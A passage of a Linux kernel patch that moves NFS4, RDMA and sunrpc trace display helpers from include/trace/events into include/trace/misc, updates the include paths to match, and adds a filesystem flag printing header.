+-TRACE_DEFINE_ENUM(NFS4ERR_NOT_SAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_NO_GRACE);
+-TRACE_DEFINE_ENUM(NFS4ERR_NXIO);
+-TRACE_DEFINE_ENUM(NFS4ERR_OLD_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_OPENMODE);
+-TRACE_DEFINE_ENUM(NFS4ERR_OP_ILLEGAL);
+-TRACE_DEFINE_ENUM(NFS4ERR_OP_NOT_IN_SESSION);
+-TRACE_DEFINE_ENUM(NFS4ERR_PERM);
+-TRACE_DEFINE_ENUM(NFS4ERR_PNFS_IO_HOLE);
+-TRACE_DEFINE_ENUM(NFS4ERR_PNFS_NO_LAYOUT);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECALLCONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_BAD);
+-TRACE_DEFINE_ENUM(NFS4ERR_RECLAIM_CONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_REJECT_DELEG);
+-TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_REP_TOO_BIG_TO_CACHE);
+-TRACE_DEFINE_ENUM(NFS4ERR_REQ_TOO_BIG);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESOURCE);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESTOREFH);
+-TRACE_DEFINE_ENUM(NFS4ERR_RETRY_UNCACHED_REP);
+-TRACE_DEFINE_ENUM(NFS4ERR_RETURNCONFLICT);
+-TRACE_DEFINE_ENUM(NFS4ERR_ROFS);
+-TRACE_DEFINE_ENUM(NFS4ERR_SAME);
+-TRACE_DEFINE_ENUM(NFS4ERR_SHARE_DENIED);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQUENCE_POS);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQ_FALSE_RETRY);
+-TRACE_DEFINE_ENUM(NFS4ERR_SEQ_MISORDERED);
+-TRACE_DEFINE_ENUM(NFS4ERR_SERVERFAULT);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE_CLIENTID);
+-TRACE_DEFINE_ENUM(NFS4ERR_STALE_STATEID);
+-TRACE_DEFINE_ENUM(NFS4ERR_SYMLINK);
+-TRACE_DEFINE_ENUM(NFS4ERR_TOOSMALL);
+-TRACE_DEFINE_ENUM(NFS4ERR_TOO_MANY_OPS);
+-TRACE_DEFINE_ENUM(NFS4ERR_UNKNOWN_LAYOUTTYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_UNSAFE_COMPOUND);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONGSEC);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONG_CRED);
+-TRACE_DEFINE_ENUM(NFS4ERR_WRONG_TYPE);
+-TRACE_DEFINE_ENUM(NFS4ERR_XDEV);
+-
+-TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_MDS);
+-TRACE_DEFINE_ENUM(NFS4ERR_RESET_TO_PNFS);
+-
+-#define show_nfs4_status(x) \
+-	__print_symbolic(x, \
+-		{ NFS4_OK,			"OK" }, \
+-		{ EPERM,			"EPERM" }, \
+-		{ ENOENT,			"ENOENT" }, \
+-		{ EIO,				"EIO" }, \
+-		{ ENXIO,			"ENXIO" }, \
+-		{ EACCES,			"EACCES" }, \
+-		{ EEXIST,			"EEXIST" }, \
+-		{ EXDEV,			"EXDEV" }, \
+-		{ ENOTDIR,			"ENOTDIR" }, \
+-		{ EISDIR,			"EISDIR" }, \
+-		{ EFBIG,			"EFBIG" }, \
+-		{ ENOSPC,			"ENOSPC" }, \
+-		{ EROFS,			"EROFS" }, \
+-		{ EMLINK,			"EMLINK" }, \
+-		{ ENAMETOOLONG,			"ENAMETOOLONG" }, \
+-		{ ENOTEMPTY,			"ENOTEMPTY" }, \
+-		{ EDQUOT,			"EDQUOT" }, \
+-		{ ESTALE,			"ESTALE" }, \
+-		{ EBADHANDLE,			"EBADHANDLE" }, \
+-		{ EBADCOOKIE,			"EBADCOOKIE" }, \
+-		{ ENOTSUPP,			"ENOTSUPP" }, \
+-		{ ETOOSMALL,			"ETOOSMALL" }, \
+-		{ EREMOTEIO,			"EREMOTEIO" }, \
+-		{ EBADTYPE,			"EBADTYPE" }, \
+-		{ EAGAIN,			"EAGAIN" }, \
+-		{ ELOOP,			"ELOOP" }, \
+-		{ EOPNOTSUPP,			"EOPNOTSUPP" }, \
+-		{ EDEADLK,			"EDEADLK" }, \
+-		{ ENOMEM,			"ENOMEM" }, \
+-		{ EKEYEXPIRED,			"EKEYEXPIRED" }, \
+-		{ ETIMEDOUT,			"ETIMEDOUT" }, \
+-		{ ERESTARTSYS,			"ERESTARTSYS" }, \
+-		{ ECONNREFUSED,			"ECONNREFUSED" }, \
+-		{ ECONNRESET,			"ECONNRESET" }, \
+-		{ ENETUNREACH,			"ENETUNREACH" }, \
+-		{ EHOSTUNREACH,			"EHOSTUNREACH" }, \
+-		{ EHOSTDOWN,			"EHOSTDOWN" }, \
+-		{ EPIPE,			"EPIPE" }, \
+-		{ EPFNOSUPPORT,			"EPFNOSUPPORT" }, \
+-		{ EPROTONOSUPPORT,		"EPROTONOSUPPORT" }, \
+-		{ NFS4ERR_ACCESS,		"ACCESS" }, \
+-		{ NFS4ERR_ATTRNOTSUPP,		"ATTRNOTSUPP" }, \
+-		{ NFS4ERR_ADMIN_REVOKED,	"ADMIN_REVOKED" }, \
+-		{ NFS4ERR_BACK_CHAN_BUSY,	"BACK_CHAN_BUSY" }, \
+-		{ NFS4ERR_BADCHAR,		"BADCHAR" }, \
+-		{ NFS4ERR_BADHANDLE,		"BADHANDLE" }, \
+-		{ NFS4ERR_BADIOMODE,		"BADIOMODE" }, \
+-		{ NFS4ERR_BADLAYOUT,		"BADLAYOUT" }, \
+-		{ NFS4ERR_BADLABEL,		"BADLABEL" }, \
+-		{ NFS4ERR_BADNAME,		"BADNAME" }, \
+-		{ NFS4ERR_BADOWNER,		"BADOWNER" }, \
+-		{ NFS4ERR_BADSESSION,		"BADSESSION" }, \
+-		{ NFS4ERR_BADSLOT,		"BADSLOT" }, \
+-		{ NFS4ERR_BADTYPE,		"BADTYPE" }, \
+-		{ NFS4ERR_BADXDR,		"BADXDR" }, \
+-		{ NFS4ERR_BAD_COOKIE,		"BAD_COOKIE" }, \
+-		{ NFS4ERR_BAD_HIGH_SLOT,	"BAD_HIGH_SLOT" }, \
+-		{ NFS4ERR_BAD_RANGE,		"BAD_RANGE" }, \
+-		{ NFS4ERR_BAD_SEQID,		"BAD_SEQID" }, \
+-		{ NFS4ERR_BAD_SESSION_DIGEST,	"BAD_SESSION_DIGEST" }, \
+-		{ NFS4ERR_BAD_STATEID,		"BAD_STATEID" }, \
+-		{ NFS4ERR_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
+-		{ NFS4ERR_CLID_INUSE,		"CLID_INUSE" }, \
+-		{ NFS4ERR_CLIENTID_BUSY,	"CLIENTID_BUSY" }, \
+-		{ NFS4ERR_COMPLETE_ALREADY,	"COMPLETE_ALREADY" }, \
+-		{ NFS4ERR_CONN_NOT_BOUND_TO_SESSION, "CONN_NOT_BOUND_TO_SESSION" }, \
+-		{ NFS4ERR_DEADLOCK,		"DEADLOCK" }, \
+-		{ NFS4ERR_DEADSESSION,		"DEAD_SESSION" }, \
+-		{ NFS4ERR_DELAY,		"DELAY" }, \
+-		{ NFS4ERR_DELEG_ALREADY_WANTED,	"DELEG_ALREADY_WANTED" }, \
+-		{ NFS4ERR_DELEG_REVOKED,	"DELEG_REVOKED" }, \
+-		{ NFS4ERR_DENIED,		"DENIED" }, \
+-		{ NFS4ERR_DIRDELEG_UNAVAIL,	"DIRDELEG_UNAVAIL" }, \
+-		{ NFS4ERR_DQUOT,		"DQUOT" }, \
+-		{ NFS4ERR_ENCR_ALG_UNSUPP,	"ENCR_ALG_UNSUPP" }, \
+-		{ NFS4ERR_EXIST,		"EXIST" }, \
+-		{ NFS4ERR_EXPIRED,		"EXPIRED" }, \
+-		{ NFS4ERR_FBIG,			"FBIG" }, \
+-		{ NFS4ERR_FHEXPIRED,		"FHEXPIRED" }, \
+-		{ NFS4ERR_FILE_OPEN,		"FILE_OPEN" }, \
+-		{ NFS4ERR_GRACE,		"GRACE" }, \
+-		{ NFS4ERR_HASH_ALG_UNSUPP,	"HASH_ALG_UNSUPP" }, \
+-		{ NFS4ERR_INVAL,		"INVAL" }, \
+-		{ NFS4ERR_IO,			"IO" }, \
+-		{ NFS4ERR_ISDIR,		"ISDIR" }, \
+-		{ NFS4ERR_LAYOUTTRYLATER,	"LAYOUTTRYLATER" }, \
+-		{ NFS4ERR_LAYOUTUNAVAILABLE,	"LAYOUTUNAVAILABLE" }, \
+-		{ NFS4ERR_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4ERR_LOCKED,		"LOCKED" }, \
+-		{ NFS4ERR_LOCKS_HELD,		"LOCKS_HELD" }, \
+-		{ NFS4ERR_LOCK_RANGE,		"LOCK_RANGE" }, \
+-		{ NFS4ERR_MINOR_VERS_MISMATCH,	"MINOR_VERS_MISMATCH" }, \
+-		{ NFS4ERR_MLINK,		"MLINK" }, \
+-		{ NFS4ERR_MOVED,		"MOVED" }, \
+-		{ NFS4ERR_NAMETOOLONG,		"NAMETOOLONG" }, \
+-		{ NFS4ERR_NOENT,		"NOENT" }, \
+-		{ NFS4ERR_NOFILEHANDLE,		"NOFILEHANDLE" }, \
+-		{ NFS4ERR_NOMATCHING_LAYOUT,	"NOMATCHING_LAYOUT" }, \
+-		{ NFS4ERR_NOSPC,		"NOSPC" }, \
+-		{ NFS4ERR_NOTDIR,		"NOTDIR" }, \
+-		{ NFS4ERR_NOTEMPTY,		"NOTEMPTY" }, \
+-		{ NFS4ERR_NOTSUPP,		"NOTSUPP" }, \
+-		{ NFS4ERR_NOT_ONLY_OP,		"NOT_ONLY_OP" }, \
+-		{ NFS4ERR_NOT_SAME,		"NOT_SAME" }, \
+-		{ NFS4ERR_NO_GRACE,		"NO_GRACE" }, \
+-		{ NFS4ERR_NXIO,			"NXIO" }, \
+-		{ NFS4ERR_OLD_STATEID,		"OLD_STATEID" }, \
+-		{ NFS4ERR_OPENMODE,		"OPENMODE" }, \
+-		{ NFS4ERR_OP_ILLEGAL,		"OP_ILLEGAL" }, \
+-		{ NFS4ERR_OP_NOT_IN_SESSION,	"OP_NOT_IN_SESSION" }, \
+-		{ NFS4ERR_PERM,			"PERM" }, \
+-		{ NFS4ERR_PNFS_IO_HOLE,		"PNFS_IO_HOLE" }, \
+-		{ NFS4ERR_PNFS_NO_LAYOUT,	"PNFS_NO_LAYOUT" }, \
+-		{ NFS4ERR_RECALLCONFLICT,	"RECALLCONFLICT" }, \
+-		{ NFS4ERR_RECLAIM_BAD,		"RECLAIM_BAD" }, \
+-		{ NFS4ERR_RECLAIM_CONFLICT,	"RECLAIM_CONFLICT" }, \
+-		{ NFS4ERR_REJECT_DELEG,		"REJECT_DELEG" }, \
+-		{ NFS4ERR_REP_TOO_BIG,		"REP_TOO_BIG" }, \
+-		{ NFS4ERR_REP_TOO_BIG_TO_CACHE,	"REP_TOO_BIG_TO_CACHE" }, \
+-		{ NFS4ERR_REQ_TOO_BIG,		"REQ_TOO_BIG" }, \
+-		{ NFS4ERR_RESOURCE,		"RESOURCE" }, \
+-		{ NFS4ERR_RESTOREFH,		"RESTOREFH" }, \
+-		{ NFS4ERR_RETRY_UNCACHED_REP,	"RETRY_UNCACHED_REP" }, \
+-		{ NFS4ERR_RETURNCONFLICT,	"RETURNCONFLICT" }, \
+-		{ NFS4ERR_ROFS,			"ROFS" }, \
+-		{ NFS4ERR_SAME,			"SAME" }, \
+-		{ NFS4ERR_SHARE_DENIED,		"SHARE_DENIED" }, \
+-		{ NFS4ERR_SEQUENCE_POS,		"SEQUENCE_POS" }, \
+-		{ NFS4ERR_SEQ_FALSE_RETRY,	"SEQ_FALSE_RETRY" }, \
+-		{ NFS4ERR_SEQ_MISORDERED,	"SEQ_MISORDERED" }, \
+-		{ NFS4ERR_SERVERFAULT,		"SERVERFAULT" }, \
+-		{ NFS4ERR_STALE,		"STALE" }, \
+-		{ NFS4ERR_STALE_CLIENTID,	"STALE_CLIENTID" }, \
+-		{ NFS4ERR_STALE_STATEID,	"STALE_STATEID" }, \
+-		{ NFS4ERR_SYMLINK,		"SYMLINK" }, \
+-		{ NFS4ERR_TOOSMALL,		"TOOSMALL" }, \
+-		{ NFS4ERR_TOO_MANY_OPS,		"TOO_MANY_OPS" }, \
+-		{ NFS4ERR_UNKNOWN_LAYOUTTYPE,	"UNKNOWN_LAYOUTTYPE" }, \
+-		{ NFS4ERR_UNSAFE_COMPOUND,	"UNSAFE_COMPOUND" }, \
+-		{ NFS4ERR_WRONGSEC,		"WRONGSEC" }, \
+-		{ NFS4ERR_WRONG_CRED,		"WRONG_CRED" }, \
+-		{ NFS4ERR_WRONG_TYPE,		"WRONG_TYPE" }, \
+-		{ NFS4ERR_XDEV,			"XDEV" }, \
+-		/* ***** Internal to Linux NFS client ***** */ \
+-		{ NFS4ERR_RESET_TO_MDS,		"RESET_TO_MDS" }, \
+-		{ NFS4ERR_RESET_TO_PNFS,	"RESET_TO_PNFS" })
+-
+-#define show_nfs4_verifier(x) \
+-	__print_hex_str(x, NFS4_VERIFIER_SIZE)
+-
+-TRACE_DEFINE_ENUM(IOMODE_READ);
+-TRACE_DEFINE_ENUM(IOMODE_RW);
+-TRACE_DEFINE_ENUM(IOMODE_ANY);
+-
+-#define show_pnfs_layout_iomode(x) \
+-	__print_symbolic(x, \
+-		{ IOMODE_READ,			"READ" }, \
+-		{ IOMODE_RW,			"RW" }, \
+-		{ IOMODE_ANY,			"ANY" })
+-
+-#define show_nfs4_seq4_status(x) \
+-	__print_flags(x, "|", \
+-		{ SEQ4_STATUS_CB_PATH_DOWN,		"CB_PATH_DOWN" }, \
+-		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRING,	"CB_GSS_CONTEXTS_EXPIRING" }, \
+-		{ SEQ4_STATUS_CB_GSS_CONTEXTS_EXPIRED,	"CB_GSS_CONTEXTS_EXPIRED" }, \
+-		{ SEQ4_STATUS_EXPIRED_ALL_STATE_REVOKED, "EXPIRED_ALL_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_EXPIRED_SOME_STATE_REVOKED, "EXPIRED_SOME_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_ADMIN_STATE_REVOKED,	"ADMIN_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_RECALLABLE_STATE_REVOKED,	"RECALLABLE_STATE_REVOKED" }, \
+-		{ SEQ4_STATUS_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ SEQ4_STATUS_RESTART_RECLAIM_NEEDED,	"RESTART_RECLAIM_NEEDED" }, \
+-		{ SEQ4_STATUS_CB_PATH_DOWN_SESSION,	"CB_PATH_DOWN_SESSION" }, \
+-		{ SEQ4_STATUS_BACKCHANNEL_FAULT,	"BACKCHANNEL_FAULT" })
+diff --git a/include/trace/events/rdma.h b/include/trace/events/rdma.h
+deleted file mode 100644
+index 81bb454fc2888..0000000000000
+--- a/include/trace/events/rdma.h
++++ /dev/null
+@@ -1,168 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (c) 2017 Oracle.  All rights reserved.
+- */
+-
+-/*
+- * enum ib_event_type, from include/rdma/ib_verbs.h
+- */
+-#define IB_EVENT_LIST				\
+-	ib_event(CQ_ERR)			\
+-	ib_event(QP_FATAL)			\
+-	ib_event(QP_REQ_ERR)			\
+-	ib_event(QP_ACCESS_ERR)			\
+-	ib_event(COMM_EST)			\
+-	ib_event(SQ_DRAINED)			\
+-	ib_event(PATH_MIG)			\
+-	ib_event(PATH_MIG_ERR)			\
+-	ib_event(DEVICE_FATAL)			\
+-	ib_event(PORT_ACTIVE)			\
+-	ib_event(PORT_ERR)			\
+-	ib_event(LID_CHANGE)			\
+-	ib_event(PKEY_CHANGE)			\
+-	ib_event(SM_CHANGE)			\
+-	ib_event(SRQ_ERR)			\
+-	ib_event(SRQ_LIMIT_REACHED)		\
+-	ib_event(QP_LAST_WQE_REACHED)		\
+-	ib_event(CLIENT_REREGISTER)		\
+-	ib_event(GID_CHANGE)			\
+-	ib_event_end(WQ_FATAL)
+-
+-#undef ib_event
+-#undef ib_event_end
+-
+-#define ib_event(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
+-#define ib_event_end(x)		TRACE_DEFINE_ENUM(IB_EVENT_##x);
+-
+-IB_EVENT_LIST
+-
+-#undef ib_event
+-#undef ib_event_end
+-
+-#define ib_event(x)		{ IB_EVENT_##x, #x },
+-#define ib_event_end(x)		{ IB_EVENT_##x, #x }
+-
+-#define rdma_show_ib_event(x) \
+-		__print_symbolic(x, IB_EVENT_LIST)
+-
+-/*
+- * enum ib_wc_status type, from include/rdma/ib_verbs.h
+- */
+-#define IB_WC_STATUS_LIST			\
+-	ib_wc_status(SUCCESS)			\
+-	ib_wc_status(LOC_LEN_ERR)		\
+-	ib_wc_status(LOC_QP_OP_ERR)		\
+-	ib_wc_status(LOC_EEC_OP_ERR)		\
+-	ib_wc_status(LOC_PROT_ERR)		\
+-	ib_wc_status(WR_FLUSH_ERR)		\
+-	ib_wc_status(MW_BIND_ERR)		\
+-	ib_wc_status(BAD_RESP_ERR)		\
+-	ib_wc_status(LOC_ACCESS_ERR)		\
+-	ib_wc_status(REM_INV_REQ_ERR)		\
+-	ib_wc_status(REM_ACCESS_ERR)		\
+-	ib_wc_status(REM_OP_ERR)		\
+-	ib_wc_status(RETRY_EXC_ERR)		\
+-	ib_wc_status(RNR_RETRY_EXC_ERR)		\
+-	ib_wc_status(LOC_RDD_VIOL_ERR)		\
+-	ib_wc_status(REM_INV_RD_REQ_ERR)	\
+-	ib_wc_status(REM_ABORT_ERR)		\
+-	ib_wc_status(INV_EECN_ERR)		\
+-	ib_wc_status(INV_EEC_STATE_ERR)		\
+-	ib_wc_status(FATAL_ERR)			\
+-	ib_wc_status(RESP_TIMEOUT_ERR)		\
+-	ib_wc_status_end(GENERAL_ERR)
+-
+-#undef ib_wc_status
+-#undef ib_wc_status_end
+-
+-#define ib_wc_status(x)		TRACE_DEFINE_ENUM(IB_WC_##x);
+-#define ib_wc_status_end(x)	TRACE_DEFINE_ENUM(IB_WC_##x);
+-
+-IB_WC_STATUS_LIST
+-
+-#undef ib_wc_status
+-#undef ib_wc_status_end
+-
+-#define ib_wc_status(x)		{ IB_WC_##x, #x },
+-#define ib_wc_status_end(x)	{ IB_WC_##x, #x }
+-
+-#define rdma_show_wc_status(x) \
+-		__print_symbolic(x, IB_WC_STATUS_LIST)
+-
+-/*
+- * enum ib_cm_event_type, from include/rdma/ib_cm.h
+- */
+-#define IB_CM_EVENT_LIST			\
+-	ib_cm_event(REQ_ERROR)			\
+-	ib_cm_event(REQ_RECEIVED)		\
+-	ib_cm_event(REP_ERROR)			\
+-	ib_cm_event(REP_RECEIVED)		\
+-	ib_cm_event(RTU_RECEIVED)		\
+-	ib_cm_event(USER_ESTABLISHED)		\
+-	ib_cm_event(DREQ_ERROR)			\
+-	ib_cm_event(DREQ_RECEIVED)		\
+-	ib_cm_event(DREP_RECEIVED)		\
+-	ib_cm_event(TIMEWAIT_EXIT)		\
+-	ib_cm_event(MRA_RECEIVED)		\
+-	ib_cm_event(REJ_RECEIVED)		\
+-	ib_cm_event(LAP_ERROR)			\
+-	ib_cm_event(LAP_RECEIVED)		\
+-	ib_cm_event(APR_RECEIVED)		\
+-	ib_cm_event(SIDR_REQ_ERROR)		\
+-	ib_cm_event(SIDR_REQ_RECEIVED)		\
+-	ib_cm_event_end(SIDR_REP_RECEIVED)
+-
+-#undef ib_cm_event
+-#undef ib_cm_event_end
+-
+-#define ib_cm_event(x)		TRACE_DEFINE_ENUM(IB_CM_##x);
+-#define ib_cm_event_end(x)	TRACE_DEFINE_ENUM(IB_CM_##x);
+-
+-IB_CM_EVENT_LIST
+-
+-#undef ib_cm_event
+-#undef ib_cm_event_end
+-
+-#define ib_cm_event(x)		{ IB_CM_##x, #x },
+-#define ib_cm_event_end(x)	{ IB_CM_##x, #x }
+-
+-#define rdma_show_ib_cm_event(x) \
+-		__print_symbolic(x, IB_CM_EVENT_LIST)
+-
+-/*
+- * enum rdma_cm_event_type, from include/rdma/rdma_cm.h
+- */
+-#define RDMA_CM_EVENT_LIST			\
+-	rdma_cm_event(ADDR_RESOLVED)		\
+-	rdma_cm_event(ADDR_ERROR)		\
+-	rdma_cm_event(ROUTE_RESOLVED)		\
+-	rdma_cm_event(ROUTE_ERROR)		\
+-	rdma_cm_event(CONNECT_REQUEST)		\
+-	rdma_cm_event(CONNECT_RESPONSE)		\
+-	rdma_cm_event(CONNECT_ERROR)		\
+-	rdma_cm_event(UNREACHABLE)		\
+-	rdma_cm_event(REJECTED)			\
+-	rdma_cm_event(ESTABLISHED)		\
+-	rdma_cm_event(DISCONNECTED)		\
+-	rdma_cm_event(DEVICE_REMOVAL)		\
+-	rdma_cm_event(MULTICAST_JOIN)		\
+-	rdma_cm_event(MULTICAST_ERROR)		\
+-	rdma_cm_event(ADDR_CHANGE)		\
+-	rdma_cm_event_end(TIMEWAIT_EXIT)
+-
+-#undef rdma_cm_event
+-#undef rdma_cm_event_end
+-
+-#define rdma_cm_event(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
+-#define rdma_cm_event_end(x)	TRACE_DEFINE_ENUM(RDMA_CM_EVENT_##x);
+-
+-RDMA_CM_EVENT_LIST
+-
+-#undef rdma_cm_event
+-#undef rdma_cm_event_end
+-
+-#define rdma_cm_event(x)	{ RDMA_CM_EVENT_##x, #x },
+-#define rdma_cm_event_end(x)	{ RDMA_CM_EVENT_##x, #x }
+-
+-#define rdma_show_cm_event(x) \
+-		__print_symbolic(x, RDMA_CM_EVENT_LIST)
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index c9048f3e471bb..3f121eed369e8 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -13,7 +13,7 @@
+ 
+ #include <linux/tracepoint.h>
+ 
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+ /**
+  ** GSS-API related trace events
+diff --git a/include/trace/events/rpcrdma.h b/include/trace/events/rpcrdma.h
+index fcd3b3f1020a6..8f461e04e5f09 100644
+--- a/include/trace/events/rpcrdma.h
++++ b/include/trace/events/rpcrdma.h
+@@ -15,8 +15,8 @@
+ #include <linux/tracepoint.h>
+ #include <rdma/ib_cm.h>
+ 
+-#include <trace/events/rdma.h>
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/rdma.h>
++#include <trace/misc/sunrpc.h>
+ 
+ /**
+  ** Event classes
+diff --git a/include/trace/events/sunrpc.h b/include/trace/events/sunrpc.h
+index f48f2ab9d238b..ffe2679a13ced 100644
+--- a/include/trace/events/sunrpc.h
++++ b/include/trace/events/sunrpc.h
+@@ -14,7 +14,7 @@
+ #include <linux/net.h>
+ #include <linux/tracepoint.h>
+ 
+-#include <trace/events/sunrpc_base.h>
++#include <trace/misc/sunrpc.h>
+ 
+ TRACE_DEFINE_ENUM(SOCK_STREAM);
+ TRACE_DEFINE_ENUM(SOCK_DGRAM);
+diff --git a/include/trace/events/sunrpc_base.h b/include/trace/events/sunrpc_base.h
+deleted file mode 100644
+index 588557d07ea82..0000000000000
+--- a/include/trace/events/sunrpc_base.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (c) 2021 Oracle and/or its affiliates.
+- *
+- * Common types and format specifiers for sunrpc.
+- */
+-
+-#if !defined(_TRACE_SUNRPC_BASE_H)
+-#define _TRACE_SUNRPC_BASE_H
+-
+-#include <linux/tracepoint.h>
+-
+-#define SUNRPC_TRACE_PID_SPECIFIER	"%08x"
+-#define SUNRPC_TRACE_CLID_SPECIFIER	"%08x"
+-#define SUNRPC_TRACE_TASK_SPECIFIER \
+-	"task:" SUNRPC_TRACE_PID_SPECIFIER "@" SUNRPC_TRACE_CLID_SPECIFIER
+-
+-#endif /* _TRACE_SUNRPC_BASE_H */
+diff --git a/include/trace/misc/fs.h b/include/trace/misc/fs.h
+new file mode 100644
+index 0000000000000..738b97f22f365
+--- /dev/null
++++ b/include/trace/misc/fs.h
+@@ -0,0 +1,122 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Display helpers for generic filesystem items
++ *
++ * Author: Chuck Lever <chuck.lever@oracle.com>
++ *
++ * Copyright (c) 2020, Oracle and/or its affiliates.
++ */
++
++#include <linux/fs.h>
++
++#define show_fs_dirent_type(x) \
++	__print_symbolic(x, \
++		{ DT_UNKNOWN,		"UNKNOWN" }, \
++		{ DT_FIFO,		"FIFO" }, \
++		{ DT_CHR,		"CHR" }, \
++		{ DT_DIR,		"DIR" }, \
++		{ DT_BLK,		"BLK" }, \
++		{ DT_REG,		"REG" }, \
++		{ DT_LNK,		"LNK" }, \
++		{ DT_SOCK,		"SOCK" }, \
++		{ DT_WHT,		"WHT" })
++
++#define show_fs_fcntl_open_flags(x) \
++	__print_flags(x, "|", \
++		{ O_WRONLY,		"O_WRONLY" }, \
++		{ O_RDWR,		"O_RDWR" }, \
++		{ O_CREAT,		"O_CREAT" }, \
++		{ O_EXCL,		"O_EXCL" }, \
++		{ O_NOCTTY,		"O_NOCTTY" }, \
++		{ O_TRUNC,		"O_TRUNC" }, \
++		{ O_APPEND,		"O_APPEND" }, \
++		{ O_NONBLOCK,		"O_NONBLOCK" }, \
++		{ O_DSYNC,		"O_DSYNC" }, \
++		{ O_DIRECT,		"O_DIRECT" }, \
++		{ O_LARGEFILE,		"O_LARGEFILE" }, \
++		{ O_DIRECTORY,		"O_DIRECTORY" }, \
++		{ O_NOFOLLOW,		"O_NOFOLLOW" }, \
++		{ O_NOATIME,		"O_NOATIME" }, \
++		{ O_CLOEXEC,		"O_CLOEXEC" })
++
++#define __fmode_flag(x)	{ (__force unsigned long)FMODE_##x, #x }
++#define show_fs_fmode_flags(x) \
++	__print_flags(x, "|", \
++		__fmode_flag(READ), \
++		__fmode_flag(WRITE), \
++		__fmode_flag(EXEC))
++
++#ifdef CONFIG_64BIT
++#define show_fs_fcntl_cmd(x) \
++	__print_symbolic(x, \
++		{ F_DUPFD,		"DUPFD" }, \
++		{ F_GETFD,		"GETFD" }, \
++		{ F_SETFD,		"SETFD" }, \
++		{ F_GETFL,		"GETFL" }, \
++		{ F_SETFL,		"SETFL" }, \
++		{ F_GETLK,		"GETLK" }, \
++		{ F_SETLK,		"SETLK" }, \
++		{ F_SETLKW,		"SETLKW" }, \
++		{ F_SETOWN,		"SETOWN" }, \
++		{ F_GETOWN,		"GETOWN" }, \
++		{ F_SETSIG,		"SETSIG" }, \
++		{ F_GETSIG,		"GETSIG" }, \
++		{ F_SETOWN_EX,		"SETOWN_EX" }, \
++		{ F_GETOWN_EX,		"GETOWN_EX" }, \
++		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
++		{ F_OFD_GETLK,		"OFD_GETLK" }, \
++		{ F_OFD_SETLK,		"OFD_SETLK" }, \
++		{ F_OFD_SETLKW,		"OFD_SETLKW" })
++#else /* CONFIG_64BIT */
++#define show_fs_fcntl_cmd(x) \
++	__print_symbolic(x, \
++		{ F_DUPFD,		"DUPFD" }, \
++		{ F_GETFD,		"GETFD" }, \
++		{ F_SETFD,		"SETFD" }, \
++		{ F_GETFL,		"GETFL" }, \
++		{ F_SETFL,		"SETFL" }, \
++		{ F_GETLK,		"GETLK" }, \
++		{ F_SETLK,		"SETLK" }, \
++		{ F_SETLKW,		"SETLKW" }, \
++		{ F_SETOWN,		"SETOWN" }, \
++		{ F_GETOWN,		"GETOWN" }, \
++		{ F_SETSIG,		"SETSIG" }, \
++		{ F_GETSIG,		"GETSIG" }, \
++		{ F_GETLK64,		"GETLK64" }, \
++		{ F_SETLK64,		"SETLK64" }, \
++		{ F_SETLKW64,		"SETLKW64" }, \
++		{ F_SETOWN_EX,		"SETOWN_EX" }, \
++		{ F_GETOWN_EX,		"GETOWN_EX" }, \
++		{ F_GETOWNER_UIDS,	"GETOWNER_UIDS" }, \
++		{ F_OFD_GETLK,		"OFD_GETLK" }, \
++		{ F_OFD_SETLK,		"OFD_SETLK" }, \
++		{ F_OFD_SETLKW,		"OFD_SETLKW" })
++#endif /* CONFIG_64BIT */
++
++#define show_fs_fcntl_lock_type(x) \
++	__print_symbolic(x, \
++		{ F_RDLCK,		"RDLCK" }, \
++		{ F_WRLCK,		"WRLCK" }, \
++		{ F_UNLCK,		"UNLCK" })
++
++#define show_fs_lookup_flags(flags) \
++	__print_flags(flags, "|", \
++		{ LOOKUP_FOLLOW,	"FOLLOW" }, \
++		{ LOOKUP_DIRECTORY,	"DIRECTORY" }, \
++		{ LOOKUP_AUTOMOUNT,	"AUTOMOUNT" }, \
++		{ LOOKUP_EMPTY,		"EMPTY" }, \
++		{ LOOKUP_DOWN,		"DOWN" }, \
++		{ LOOKUP_MOUNTPOINT,	"MOUNTPOINT" }, \
++		{ LOOKUP_REVAL,		"REVAL" }, \
++		{ LOOKUP_RCU,		"RCU" }, \
++		{ LOOKUP_OPEN,		"OPEN" }, \
++		{ LOOKUP_CREATE,	"CREATE" }, \
++		{ LOOKUP_EXCL,		"EXCL" }, \
++		{ LOOKUP_RENAME_TARGET,	"RENAME_TARGET" }, \
++		{ LOOKUP_PARENT,	"PARENT" }, \
